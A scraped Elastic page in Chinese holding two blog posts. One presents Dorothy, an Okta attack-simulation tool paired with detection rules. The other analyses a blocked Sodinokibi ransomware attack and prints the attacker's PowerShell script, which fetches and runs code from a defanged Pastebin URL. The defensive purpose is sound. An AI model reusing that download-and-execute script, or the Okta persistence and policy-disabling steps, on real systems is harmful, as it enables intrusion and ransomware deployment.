Dorothy 是一款工具，安全团队可用它来测试他们在 Okta 环境中的可见性和检测能力。IAM 解决方案经常成为敌手的攻击目标，尽管如此，它们在监测方面却十分欠缺。请阅读本博文，了解如何开始使用 Dorothy。

<p>当安全团队与其组织中的利益相关者进行探讨时，他们很少能够自信地证明日志和警报功能可达到预期要求。组织的模式已经变得愈加分散，对于身份和访问权限管理、用户生产效率和文件存储等这样的用例，组织更加依赖于云产品/服务来实现。同时，敌手也已经扩展了他们在云环境中的行动能力。至关重要的是，安全团队要能够监测这些系统的滥用情况，才可保护组织的数据免受攻击。
</p><p><a href="https://github.com/elastic/dorothy">Dorothy</a> 是一款免费开放的工具，可以帮助安全团队测试他们在 Okta 单点登录 (SSO) 环境中的可见性、监测和检测能力。我们将演示如何使用 Dorothy<strong> </strong>来执行测试，以及如何使用<a href="https://github.com/elastic/detection-rules/">免费开放的检测规则</a>通过 <a href="/cn/security">Elastic 安全</a>对相关和可疑的行为发出警报。
</p> <strong><h2><strong>Okta SSO 是什么？</strong></h2></strong><p>可能有对此不熟悉的用户，先简单做一下普及：<a href="https://www.okta.com/products/single-sign-on/">Okta SSO</a> 是一种基于云的身份管理解决方案，用户使用一个用户帐户就可以对所在组织内的各种系统和应用程序进行身份验证。告知最终用户，他们不需要记住十多个用户名和密码，只记住<em>一个</em>就够，这样既可以降低用户养成不良密码管理习惯的风险，还能够让系统管理员实施更严格的密码策略。此外，还可以在 Okta 中配置多因素身份验证 (MFA) 策略，进一步提升对攻击者的防护能力。许多攻击者在发现目标网络或用户帐户中实施了 MFA 时，他们会转而寻找更容易的目标。
</p><p>虽然 SSO 解决方案可以为组织提供便捷的用户体验并降低网络安全风险，但这些集中式系统为许多系统和应用程序提供了一把万能钥匙，这常常会成为攻击者的主要攻击目标。安全团队必须了解 Okta 环境中的正常行为是怎样的，这样才可以更容易地识别可疑活动。
</p> <strong><h2><strong>认识 Dorothy</strong></h2></strong><p><a href="https://github.com/elastic/dorothy">Dorothy</a> 有超过 25 个模块用来模拟攻击者在 Okta 环境中操作时可能采取的行动，以及安全团队应该监测、检测并发出警告的行为。所有模块都映射到相关的 <a href="https://attack.mitre.org/">MITRE ATT&CK®</a> 战术，如持久化、防御规避、发现和影响。
</p><p><img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8eae61fb97d445e6/5fcbb9e859bd313bf83113fc/1-Dorothy-blog-listing-modules.png" data-sys-asset-uid="blt8eae61fb97d445e6" alt="1-Dorothy-blog-listing-modules.png" style="display: block; margin: auto">
</p><figcaption>图 1 — 启动 Dorothy 并列出其模块</figcaption><p>创建 Dorothy 的初衷是为了帮助防御者测试他们的安全可见性和控制力，并不提供任何模块来获得 Okta 环境中的初始访问权限或提升权限。要使用 Dorothy 执行操作，需要一个有效的 Okta API 令牌，该令牌应关联到分配有一个或多个管理员角色的用户。
</p><p>Dorothy 提供了具有上下文帮助且方便使用的 shell 界面，可在菜单和模块之间轻松导航，帮助引导用户完成入侵者场景模拟。其他功能还包括：提供配置概要文件（用于管理与各个 Okta 环境的连接）以及详细的日志，并可根据需要将事件索引添加到 Elasticsearch 中，以提供对使用 Dorothy 所执行操作的审计跟踪。
</p> <strong><h2><strong>在 Okta 环境中使用 Dorothy 执行操作</strong></h2></strong><p>在这一部分，我们将演示如何在 Okta 环境中执行 Dorothy 的一些模块。下面的图 2 显示了 Elastic 安全用户的典型工作流。在这个演示之后，您应该可以轻松地转到 Dorothy 的 GitHub 存储库，并按照该项目的 <a href="https://github.com/elastic/dorothy/wiki">Wiki</a> 页中“Getting Started”（入门）部分的入门步骤进行操作。
</p><p><img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt005b0e7a6479bf43/5fcbba02e5f85744d50f1a57/2-Dorothy-blog-example_workflow.png" data-sys-asset-uid="blt005b0e7a6479bf43" alt="2-Dorothy-blog-example_workflow.png" redactor"="" style="display: block; margin: auto data-verified=">
</p><figcaption>图 2 — 使用 Dorothy 在 Okta 环境中执行操作的示例工作流</figcaption><p> <strong></strong>
</p><h3><strong><strong><em>whoami？</em></strong></strong></h3><p>我们站在攻击者的角度想一想他们在 Okta 环境中操作时可能会采取什么行动。作为一个找到初始落脚点的攻击者，我首先想到的问题是我对我拥有 API 令牌的用户有什么了解。让我们通过 Dorothy 的 <code>whoami</code> 命令来模拟这个攻击者的操作，以查看关联用户的登录 ID、上次登录时间和上次密码更改时间。
</p><p>现在我们已经对我们控制的用户帐户有了更好的了解，接下来我们先列出 Dorothy 的模块并看一下帮助菜单，然后再进行下一步的操作。
</p><div class=" video=" "="" embed-container"="">
	<img class="vidyard-player-embed" src="https://play.vidyard.com/iG2cr4pHfUSwwVyk3paivS.jpg" data-uuid="iG2cr4pHfUSwwVyk3paivS" data-v="4" data-type="inline" data-autoplay="1" data-loop="1" data-disable_analytics="1" data-hidden_controls="1" data-muted="1" disable_analytics="1" style="width: 100%; margin: auto; display: block;">
	<figcaption>图 3 — 执行 Dorothy 的 whoami 和 list-modules 命令<br><br></figcaption>
	<h3><strong><em>发现</em></strong></h3>
	<p>Dorothy 有若干个发现模块，我们可以用来模拟攻击者可能获得的关于 Okta 环境的信息。敌手通常会在获得初始访问权限后花时间了解环境的细节，这些细节对于他们在计划下一步行动之前确定自己的方向至关重要。
	</p>
	<p>让我们尝试通过收集以下信息来了解 Okta 环境：
	</p>
	<ul>
		<li>用户 — 在选择要进行控制、修改或保留原样（以避免被检测到）的帐户时，包含有姓名、登录 ID、电子邮件地址、密码恢复问题和每个用户状态的列表将非常有用。</li>
		<li>策略 — <a href="https://help.okta.com/en/prod/Content/Topics/Security/Security_Policies.htm">Okta 策略</a>用于控制安全要素，包括密码复杂性和 MFA 要求，以及允许用户使用的设备。如果我们决定削弱目标安全配置的某些组件，这些信息将派上用场。</li>
		<li>区域 — <a href="https://help.okta.com/en/prod/Content/Topics/Security/network/network-zones.htm">网络区域</a>可用于定义 Okta 环境的安全边界。与策略类似，这些信息有助于我们了解环境的配置方式，并在对允许或阻止流量的方式进行任何更改之前做出明智的决策。</li>
	</ul>
	<p>最后，我们将执行 <code>find-admins</code> 模块来枚举每个 Okta 用户的角色，并确定哪些用户分配有一个或多个管理员角色。
	</p>
	<div class="video embed-container" style="height: 319.725px;">
		<img class="vidyard-player-embed" src="https://play.vidyard.com/TkDuAJQwKabkyj375rfYPe.jpg" data-uuid="TkDuAJQwKabkyj375rfYPe" data-v="4" data-type="inline" data-autoplay="1" data-loop="1" data-disable_analytics="1" data-hidden_controls="1" data-muted="1" disable_analytics="1" style="width: 100%; margin: auto; display: block;">
	</div><figcaption>图 4 — 执行 Dorothy 的“发现”模块以获取有关 Okta 环境的信息</figcaption>
	<p>其他有助于信息收集任务的发现模块包括：<code>find-users-without-mfa</code>，用于查找仅使用用户名和密码进行身份验证的用户；以及 <code>find-admin-groups</code>，用于确定分配有一个或多个管理员角色的用户组。
	</p> <strong>
	<h3><strong><em>持久化</em></strong></h3></strong>
	<p>在攻击者获得对目标环境的访问权限后，他们可能就会伺机建立持久后门。持久化可以帮助攻击者在失去初始落脚点的情况下维持访问权限。通常情况下，当安全团队检测到攻击者的存在并禁用了攻击者正在使用的遭入侵用户帐户，或在网络外围阻止了他们的通信时，敌手才可能失去访问权限。
	</p>
	<p>拥有一种或多种持久化机制意味着，即使其中一个途径被阻止或中断，攻击者依然能够继续执行他们的任务。在这个示例中，我们将使用 Dorothy 的 <code>create-user</code> 和 <code>create-admin-user</code> 模块来创建一个 Okta 用户，并为这个新用户<a href="https://github.com/elastic/detection-rules/blob/main/rules/okta/persistence_administrator_role_assigned_to_okta_user.toml">分配一个管理员角色</a>。接下来，我们将为另一个 Okta 用户创建一个密码恢复问题，以便我们能够完成为该用户重置密码的过程，并控制其帐户，这是另一种持久化方法。
	</p>
	<div class="video embed-container" style="height: 319.725px;">
		<img class="vidyard-player-embed" src="https://play.vidyard.com/GBE6rQG2gxPGLhysSSTZet.jpg" data-uuid="GBE6rQG2gxPGLhysSSTZet" data-v="4" data-type="inline" data-autoplay="1" data-loop="1" data-disable_analytics="1" data-hidden_controls="1" data-muted="1" disable_analytics="1" style="width: 100%; margin: auto; display: block;">
	</div><figcaption>图 5 — 创建和修改 Okta 用户帐户以建立持久化</figcaption>
	<p>Dorothy 还有其他一些持久化模块，也可帮助我们了解攻击者可能采取的步骤，例如 <code>reset-factors</code> 用于<a href="https://github.com/elastic/detection-rules/blob/main/rules/okta/persistence_attempt_to_reset_mfa_factors_for_okta_user_account.toml">删除用户注册的身份验证因素</a>，<code>reset-password</code> 用于生成一个重置用户密码的一次性链接。
	</p> <strong>
	<h3><strong><em>防御规避</em></strong></h3></strong>
	<p>敌手会在整个任务中试图实施防御规避技术，以避免被检测到。例如，攻击者可能会试图禁用安全日志，以使安全团队察觉不到他们的违法行为。
	</p>
	<p>现在，我们已经获得了有关环境的信息，并配置了几种形式的持久化。下面我们执行 Dorothy 的 <a href="https://github.com/elastic/detection-rules/blob/main/rules/okta/okta_attempt_to_deactivate_okta_policy.toml"><code>change-policy-state</code></a> 和 <a href="https://github.com/elastic/detection-rules/blob/main/rules/okta/attempt_to_deactivate_okta_network_zone.toml"><code>change-zone-state</code></a> 模块，以削弱“目标”的安全控制。
	</p>
	<div class="video embed-container" style="height: 319.725px;">
		<img class="vidyard-player-embed" src="https://play.vidyard.com/ibEzpdD2KPKKK83d3n556d.jpg" data-uuid="ibEzpdD2KPKKK83d3n556d" data-v="4" data-type="inline" data-autoplay="1" data-loop="1" data-disable_analytics="1" data-hidden_controls="1" data-muted="1" disable_analytics="1" style="width: 100%; margin: auto; display: block;">
	</div><figcaption>图 6 — 停用 Okta 策略和网络区域对象</figcaption>
	<p>其他以防御规避为主题的模块可以激活、停用或修改其他 Okta 对象，如应用程序和各个策略规则。
	</p>
	<p>到这里我们虚构的攻击场景就结束了，如果您想了解 Dorothy 的其他功能，请前往 <a href="https://github.com/elastic/dorothy">GitHub 存储库</a>了解更多信息。
	</p> <strong>
	<h2><strong>使用 Elastic 安全检测可疑行为</strong></h2></strong>
	<p>在这一部分，我们将演示 Okta 的<a href="https://help.okta.com/en/prod/Content/Topics/Reports/Reports_SysLog.htm">系统日志</a>如何增强我们的免费检测规则，以监测可疑行为并提醒团队注意。
	</p>
	<p>通过 Okta 的系统日志，能够对在组织环境中观测到的活动进行审计跟踪。这包括用户登录或更改密码、管理员更改配置等活动。该数据源对于安全监测、调查、合规性和响应活动非常有用。
	</p> <strong>
	<h3><strong><em>通过 Fleet 采集 Okta 系统日志</em></strong></h3></strong>
	<p><a href="/guide/en/fleet/current/fleet-overview.html">Fleet</a> 在 Kibana 中提供了一个基于 Web 的 UI，用于添加和管理热门服务及平台（包括 Okta、AWS、Azure、Google Cloud Platform、Google Workspace 等）的集成。Fleet 的 Okta 集成提供了一种简便的方法来采集和规范 Okta 的系统日志事件。
	</p>
	<p><img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt1fc3d0e8b7275ec1/5fcbba31a84f233eaf60eee8/7-Dorothy-blog-reviewing-fleet.png" data-sys-asset-uid="blt1fc3d0e8b7275ec1" alt="7-Dorothy-blog-reviewing-fleet.png" style="display: block; margin: auto">
	</p><figcaption>图 7 — 查看 Kibana 中 Fleet 的 Okta 集成</figcaption>
	<p>已经在使用 Beats 的团队也可以使用 <a href="/guide/en/beats/filebeat/current/filebeat-module-okta.html">Okta Filebeat 模块</a>。
	</p> <strong>
	<h3><strong><em>使用 Elastic 安全的免费检测规则检测可疑行为</em></strong></h3></strong>
	<p>Elastic 安全保护团队为了开发针对终端、云和网络平台的检测和预防措施，对敌手的谍报技术进行了深入研究。我们的<a href="https://github.com/elastic/detection-rules">检测规则</a>是免费的，并且与更广泛的安全社区一起在开放的环境中开发。
	</p>
	<p>我们的 Okta 规则利用已规范化为 <a href="/guide/en/ecs/current/ecs-reference.html">Elastic Common Schema (ECS)</a> 且已编制索引的系统日志事件，并提醒安全团队注意相关和可疑的行为。
	</p>
	<p>下面的图 8 显示了在使用 Dorothy 模拟攻击者在 Okta 环境中可能采取的行动之后，Elastic 安全中显示的许多警报。
	</p>
	<p><img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4504667e3ac7b82d/5fcbba4cee448a54fd0cbc2e/8-Dorothy-blog-reviewing-alerts.png" data-sys-asset-uid="blt4504667e3ac7b82d" alt="8-Dorothy-blog-reviewing-alerts.png" style="display: block; margin: auto">
	</p><figcaption>图 8 — 在 Elastic 安全中查看处于“未处理”状态的警报</figcaption>
	<p>对于那些比较烦人的误报该怎么办呢？通过向 Elastic 安全的规则中添加例外情况来过滤常规和预期的行为，即可轻松化解这个烦恼。这项功能包括一个选项，可将与例外情况匹配的所有警报都关掉，这可大大节省您的时间。
	</p>
	<p><img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt7ed73d87b82b1650/5fcbba59da1c393383d3dd8d/9-Dorothy-blog-adding_exception.png" data-sys-asset-uid="blt7ed73d87b82b1650" alt="9-Dorothy-blog-adding_exception.png" style="display: block; margin: auto">
	</p><figcaption>图 9 — 向 Elastic 安全中的 Okta 规则添加例外情况</figcaption>
	<p> <strong></strong>
	</p>
	<h2><strong><strong>用 Dorothy 评测您的云防御情况</strong></strong></h2>
	<p>Okta 和其他身份管理解决方案经常成为敌手的攻击目标，话虽如此，但往往是监测不到位所致。我们着力打造 Dorothy 这款工具，就是为了帮助安全团队了解敌手如何在 Okta 环境中操作，从而进一步使他们能够测试其可见性和我们免费开放的检测规则的有效性。
	</p>
	<p>您可以通过访问该项目的 <a href="https://github.com/elastic/dorothy/wiki">Wiki</a> 页来了解如何开始使用 Dorothy。如果您还不是 Elastic 安全用户，现在即可注册<a href="/cn/cloud/">免费的云试用版</a>，并查看我们的免费<a href="/cn/blog/elastic-security-opens-public-detection-rules-repo">检测规则</a>。
	</p>
</div>

blog-banner-dorothy-cow.png

blog-thumb-dorothy-cow.png

Testing your Okta visibility and detection with Dorothy and Elastic Security

使用 Dorothy 和 Elastic 安全测试您的 Okta 可见性和检测能力

<p>上个月，<a href="/cn/blog/introducing-elastic-endpoint-security">Elastic 安全</a>保护团队阻止了一次尝试未果的勒索软件攻击，此次攻击针对的是由我们一个客户（一家托管服务提供商 (MSP)）监测的一家公司/组织。<a href="/cn/products/endpoint-security">Elastic Endpoint Security</a> 在多个端点上阻止了敌手的进程注入尝试后，我们分析了所生成的告警。敌手通常首先尝试将他们的恶意代码注入到当前运行进程中，然后才会加密并攫取受害人的数据以进行勒索。
</p>
<p>我们在此案例中观测到的行为与有关恶意行动者的报告相一致，这些恶意行动者为了在企业层面部署勒索软件已将目光瞄准了 MSP。通过滥用 MSP 与其客户之间的信任关系，此类性质的攻击所造成的影响越来越大：能够让小型企业瘫痪，干扰交通运输，甚至中断至为关键的市政公共服务。
</p>
<p>在此案例中有很重要的一点需要注意：敌手是通过另外一家 MSP（并非 Elastic 安全解决方案的客户）进入目标环境的，所以对于所涉环境以及其遭到入侵的过程我们并不知晓具体细节。
</p>
<p>在此篇博文中，我们将会讨论所观测到并阻止的恶意行为，为什么此类攻击通常能广为传播并取得成功，以及您可以在企业中采取哪些措施来降低此类攻击的有效性。
</p>
<table style="background: #FFFFD2;" rel="background: #FFFFD2;">
<tbody>
<tr>
	<td>Elastic 安全情报与分析是 Elastic 安全工程部门内的一个团队，该团队会使用来自参与计划的客户的匿名安全遥测数据来跟踪威胁并改进产品，其任务之一就是收集告警元数据。通过监测对诸多客户造成影响的事件的模式，我们能够及时作出决策，从而更好地缓解新出现的威胁或为社区提供关键信息。
	</td>
</tr>
</tbody>
</table>
<h2>阻止恶意进程注入</h2>
<p>阻止了数次<a href="https://attack.mitre.org/techniques/T1055/">进程注入</a>尝试后，我们发现了入侵的最早期证据。恶意行动者可利用进程注入来执行当前运行进程的地址空间中的代码。敌手经常通过执行这一操作来实现下列目的：避免被安全产品检测到，或者在运行于更高完整性级别上的进程中运行他们的恶意代码以提升自身权限。
</p>
<p><img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0e931adeb1ae4bfd/5de55b56546f955ab898caa6/ransomware-prevention-blog-process-injection-alerts.png" data-sys-asset-uid="blt0e931adeb1ae4bfd" alt="ransomware-prevention-blog-process-injection-alerts.png" style="display: block; margin: auto; border:1px solid black;">
</p><figcaption style="text-align: center;" rel="text-align: center;">Elastic Endpoint Security 平台中的进程注入告警</figcaption>
<p>通过分析进程注入告警，我们得以确定 PowerShell（一款强大的原生脚本框架）被用来尝试向其自身注入 Shellcode（这一行为通常都是恶意的）。<code>powershell.exe</code> 进程作为 <code>ScreenConnect.WindowsClient.exe</code>（一款远程桌面支持应用程序）的一个子进程被成功创建出来。ScreenConnect 等此类软件可用于允许 IT 管理员连接至远程计算机并为终端用户提供支持，但此类应用程序经常会遭到敌手的滥用（这一策略又称作“离地攻击”）。
</p>
<p>下图便是 Resolver™ 中与此案例相关的异常进程系谱，我们通过可视化来展示与攻击相关的事件。
</p>
<p><img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt99a68ebf6b2fa11e/5dd85905cbf96739d40873e2/ransomware-prevention-blog-resolver.jpg" data-sys-asset-uid="blt99a68ebf6b2fa11e" alt="" style="display: block; margin: auto; border:1px solid black;">
</p><figcaption style="text-align: center;" rel="text-align: center;">Resolver™ 显示与进程注入尝试行为相关的进程系谱</figcaption>
<p>请注意 <code>cmd.exe</code> 和 <code>powershell.exe</code> 均为 <code>ScreenConnect.WindowsClient.exe</code> 进程的子进程。鉴于它们能够执行恶意命令或脚本，这一点很可疑，但单独来看的话，这并不一定表示存在恶意活动。为您的环境建立基线，并理解企业中正常进程间的关系，这两点对猎捕、检测和响应恶意行为十分关键。
</p>
<p>在此案例中，通过对进程及其命令行变量进行审查，我们发现敌手正是利用了 ScreenConnect 远程桌面软件来连接至目标端点并向其中复制了一个批处理文件。通过在 Resolver™ 中检查一个 <code>cmd.exe</code> 进程，我们发现这个批处理文件包括一个通过 Base64 编码的 PowerShell 脚本且此脚本随后得到了执行。
</p>
<h2>通过 EQL 检测并阻止非预期行为</h2>
<p>尽管这家由 Elastic Endpoint Security 提供保护的潜在目标公司/组织避免了一次代价高昂的勒索软件爆发，但仍有很多 MSP 尚未能理解这一方法。这个敌手知道服务提供商通常已与其客户建立绝对信任关系，因而各种各样的服务提供商对敌手而言很有价值。
</p>
<p>一旦敌手获得了其目标环境的最初访问权限，他们很典型的做法就是寻求并滥用这种绝对信任关系，正如我们在此案例中看到的一样。受害的公司/组织信任 MSP 通过远程桌面支持应用程序与其环境建立的连接，这就导致了<a href="https://attack.mitre.org/techniques/T1195/">供应链入侵</a>风险。
</p>
<p>在考虑如何监测和保护这些信任关系时，一个很好的出发点就是聚焦于能从受信任方连接至您的网络的应用程序。将 ScreenConnect 的子进程加入黑名单可能并非阻止此类恶意行为的可行解决方案，因为这可能会阻止合法支持人员有效开展工作。然而，安全监测团队可以决定将使用网络的 ScreenConnect 子进程归于可疑之列，进而检测和阻止恶意行为。借助 <a href="https://www.endgame.com/blog/technical-blog/getting-started-eql">Elastic 的 Event Query Language（EQL，事件查询语言）</a>便能够做到这一点，而且这也是培养环境意识的一个常用方法。
</p>
<p>下方的 EQL 查询会搜索一个包括两个事件的序列（通过进程的唯一进程 ID (PID) 连接在一起）。第一个事件会查找 <code>ScreenConnect*.exe</code> 的子进程。第二个事件会查找来自该子进程的网络活动。这个查询可以轻松地进行扩展，以将其他远程访问软件也包括在内，或筛选您环境中的预期活动。
</p>
<pre class="prettyprint">sequence by unique_pid
  [process where descendant of [process where process_name == "ScreenConnect*.exe"]]
  [network where true]
</pre>
<p>通过 Elastic Endpoint Security，用户还能够配置一个 <a href="https://www.endgame.com/blog/executive-blog/what-is-reflex">Reflex 响应行动</a>，通过这种方法客户能够实施他们自己的自定义阻止规则。举个例子，当子进程建立网络连接时，我们可以强行将其关闭，这样便能够阻止下载更多恶意代码，或阻止命令和控制活动。
</p>
<p><img src="https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9d4886f851ceb49a/5dd85ad8fcb522353a694edf/ransomware-prevention-blog-reflex-response.png" data-sys-asset-uid="blt9d4886f851ceb49a" style="display: block; margin: auto; border:1px solid black;">
</p><figcaption style="text-align: center;" rel="text-align: center;">在 Elastic Endpoint Security 平台中配置 Reflex 响应行动</figcaption>
<p>Elastic Endpoint Security 提供了数百条我们自己的、基于行为的分析结果，其中便包括一些检测和阻止方法，针对的就是 Windows、MacOS 或 Linux 操作系统原生第三方管理工具或二进制文件的异常进程关系。
</p>
<h2>对敌手谍报技能的分析结果</h2>
<p>所执行的 PowerShell 脚本首先会检查处理器架构，然后才会利用 .NET <code>WebClient</code> 类从 Pastebin 下载内容，并利用 <code>Invoke-Expression</code> (<code>IEX</code>) cmdlet 来执行代码。通过 PowerShell 来下载和执行代码时，这在敌手当中是一种特别流行的做法。
</p>
<p>Pastebin 是一项纯文本托管和分享服务，合法用户经常使用此服务来分享代码片段。然后，恶意行动者也会利用 Pastebin 或类似网站来存储恶意代码或发布已泄露的凭据。
</p>
<pre>If ($ENV:PROCESSOR_ARCHITECTURE  - contains 'AMD64')  {
    Start - Process  - FilePath "$Env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"  - argument "IEX ((new-object net.webclient).downloadstring('https://pastebin[.]com/raw/[REDACTED]'));Invoke-LJJJIWVSRIMKPOD;Start-Sleep -s 1000000;"
} else {
    IEX ((new - object net.webclient).downloadstring('https://pastebin[.]com/raw/[REDACTED]'));
    Invoke - LJJJIWVSRIMKPOD;
    Start - Sleep  - s 1000000;
}
</pre><figcaption style="text-align: center;" rel="text-align: center;">从 pastebin.com 下载内容<sup>1</sup> 的 PowerShell 脚本
</figcaption>
<p>由于在端点上完全没有或仅有极少的磁盘活动，所以此类行为通常会归类为“无文件”或“内存内”攻击。Elastic Endpoint Security 代理检测到“无文件”攻击时，其会自动收集并提取预发布的已注入代码和字符串。此功能确保了我们对所阻止行为拥有完整可见性。
</p>
<p>在 <a href="https://www.virustotal.com/">VirusTotal</a> 上对所收集的部分字符串进行搜索后，我们发现了来自 Sodinokibi 勒索软件家族的数个样本。
</p>
<p>下面的具体工具标记和行为表示：此活动与 BleepingComputer 和 <a href="https://www.cynet.com/blog/ransomware-never-dies-analysis-of-new-sodinokibi-ransomware-variant/">Cynet</a> 所举报的 Sodinokibi 或 Gandcrab 勒索软件样本的执行活动一致：
</p>
<ul>
	<li>恶意行动者利用 ScreenConnect 远程桌面支持软件来从侵入的 MSP 连接到目标企业。</li>
	<li>ScreenConnect 被用来向端点上复制一个批处理脚本，这个批处理脚本上包含一个 PowerShell 脚本，以便从 Pastebin 下载并注入恶意代码。</li>
	<li>PowerShell 脚本包含 cmdlet 和字符串（例如 <code>Invoke-LJJJIWVSRIMKPOD</code> 和 <code>Start-Sleep</code>），而这些内容已在其他 Sodinokibi 勒索软件活动中观测到。</li>
	<li>从所注入线程中收集的字符串与过去 24 小时内提交至 VirusTotal 的 Sodinokibi 勒索软件样本一致。</li>
</ul>
<p>敌手向自身注入 Shellcode 并执行勒索软件的企图被阻止后，他们对最初端点的攻击停止。15 分钟后，敌手返回并企图在另外 5 个端点上执行同一套程序，均以失败告终，此后他们才最终放弃。他们尝试部署勒索软件的所有行为均被阻止。
</p>
<h2>结论</h2>
<p>在此篇文章中，我们讨论了一个关于恶意行动者滥用 MSP 与其客户间的信任关系并企图部署勒索软件的真实案例。这一案例凸显了理解下面两点的重要性：贵公司/组织与第三方之间的关系，以及如果连接遭到滥用可能会造成哪些影响。
</p>
<p>通过对告警进行分析，我们知道敌手通过远程桌面支持软件连接至客户环境并执行了恶意脚本，以期能够下载、注入并执行恶意软件。敌手的所有尝试行为均被阻止。
</p>
<p>这一案例还展示了下面两点的重要性：需要采用分层安全方法，而且必须能够检测并阻止敌方行为和“无文档”攻击。我们剖析了攻击者采用的程序，并展示了如何搭配使用 EQL 和 Reflex 来创建自定义规则和响应。
</p>
<p>仅查找恶意文件尚且不够；Elastic Endpoint Security 针对勒索软件、“无文件”攻击、钓鱼、漏洞攻击和敌方行为提供基于行为的多层保护措施。
</p>
<p><a href="https://github.com/elastic/elasticsearch/issues/49581">Elasticsearch 中已添加 EQL 支持</a>。
</p>
<p><em>1 — 此内容随后已由其创建者或 Pastebin 员工从 Pastebin 中删除
	</em>
</p>

Articles by David French

使用 Dorothy 和 Elastic 安全测试您的 Okta 可见性和检测能力

勒索软件，成功拦截：Sodinokibi 和供应链

产品

公司

资源